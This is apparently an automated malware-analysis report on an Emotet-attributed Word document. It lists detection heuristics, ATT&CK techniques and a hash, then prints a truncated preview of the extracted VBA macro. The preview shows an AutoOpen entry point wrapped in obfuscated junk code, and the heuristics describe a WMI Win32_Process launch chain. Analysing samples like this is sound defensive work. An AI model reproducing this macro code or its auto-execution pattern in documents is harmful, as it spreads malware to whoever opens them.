Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen entry point, a technique commonly used by Emotet maldocs. The critical heuristic 'VBA WMI Win32_Process launcher' indicates that the macro attempts to start a process through WMI rather than a direct Shell call. The ClamAV signature also attributes the file to the Emotet family. The heavily obfuscated VBA code most likely downloads and executes a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6937887-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6937887-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40315 bytes |

SHA-256: 2b26238f1c7d8796a70a03b3d989d17233d89cb494695cab2adc46a836d50e8d

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "tBAAAG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R1C_4A"
Attribute VB_Base = "0{B1EE40FA-7329-4C20-AA0A-E7D776C70CC0}{C8FDBB7D-82E1-4452-BAF4-BF494D09CCE0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vxAQUo"
Attribute VB_Base = "0{20557A4A-1382-474F-8B5B-78196734D616}{20852D19-4292-4190-9E98-A5287CADD69A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "h_QkUU"
Sub autoopen()
If oADAADG = M4AAUA Then
Do While tDQCAQAo And QBAAwcA
While Z4AocB_U And 726376279
V44AAx = Asc(213943794 / Oct(423553993))
Wend
For BBAQDAXA = 365821946 To 166260168
UZXAXA = 120658214
Next
Set ixAXUAXA = QxA_AwDA
If pDUADw Eqv 89188184 Then
pA1DDAB = CDate(jDxoAUx)
End If
While CABDX4U < OABZAA
SxACxAB = (VAAwAU1o)
Wend
Loop
End If
If vkD_XCX = K_AB4xA Then
Do While YwXAA1U And cAcAADw
While CBAc4UB And 566333637
VA_DAZc = Asc(796066926 / Oct(289573419))
Wend
For oQU_AC = 506896795 To 578651752
SAAoBBZ4 = 486230626
Next
Set vADAD1 = I1AZAA
If acADcD Eqv 950535512 Then
AZXAZX = CDate(EoUAxBG)
End If
While IUA1X4A < jAAABk
DQAwGk = (JUU_ZU)
Wend
Loop
End If
dGGGwA
If M1GBAD_ = V_kkxX4 Then
Do While Y_1QADAB And tA_4UZ
While dUAw1w And 192489091
MAAGAAw = Asc(532600820 / Oct(825631717))
Wend
For B1wAZAD = 29409450 To 945005348
fUAxoUAX = 66032903
Next
Set zU4BAAG = iUBDAA
If wAAGQZGA Eqv 609248923 Then
b1AAAUAA = CDate(u1DUAkX)
End If
While nUwZwAUC < zQBQoAQC
kAD1DDBA = (T_XA1A1A)
Wend
Loop
End If
If U1AoZAA = sAABAU Then
Do While CBAoXkA And zAoDBxkA
While IQAUx1 And 958281172
k_G_cA = Asc(300482910 / Oct(623348565))
Wend
For KXAAB1D = 878863023 To 903272645
aZAZ_c = 320804914
Next
Set fwA_B_1B = cUABUcB
If VCUAXA Eqv 193686275 Then
wQQcZA = CDate(NBAkxAc1)
End If
While KCAZ4AX < KAAwDZDo
doUGUAxB = (jAQA4cc)
Wend
Loop
End If
End Sub
Attribute VB_Name = "lAAcGAQA"
Function dGGGwA()
On Error Resume Next
If zA1DGU = iwxABC Then
Do While EAXBAA And GQUkAGD
While WDGxAX And 790393416
EkZoUAA = Asc(367390638 / Oct(459947747))
Wend
For N4XAUC = 142121423 To 696056855
wBAAU41A = 276105562
Next
Set VxGckwB = oXAQAB
If QBADAAA Eqv 269873149 Then
PA4AXAU = CDate(bA4A1AC)
End If
While oDUBAGUA < JBZAAQ
iAxAAXAA = (GAD1AAZc)
Wend
Loop
End If
If nA4AkQAw = IA_AkD Then
Do While WDQGZQA And XBUxQB
While q_1C_w And 60743499
KUQBADxD = Asc(258666822 / Oct(149040589))
Wend
For HDAB_o = 397702972 To 261942438
iUA1oDB = 964883333
Next
Set NGAAQUAA = OUAwGUG
If SGAQBDDA Eqv 317742661 Then
p1xABZAU = CDate(CG4UAXoD)
End If
While VXcQADo < l_ZQABcU
IGc4w1x = (LAXAGAQ)
Wend
Loop
End If
If zBA_A_Q = DkwAAUA_ Then
Do While iDABkkQB And RXDoAABX
While JQQAXAcD And 468716589
NUcX1Bc = Asc(503535816 / Oct(339511960))
Wend
For nAAoAA_o = 871659490 To 705141349
ZAQZADA = 672987809
Next
Set HD_DUkwB = A1c4xAU
If fAA4DZ1 Eqv 760726948 Then
H
... (truncated)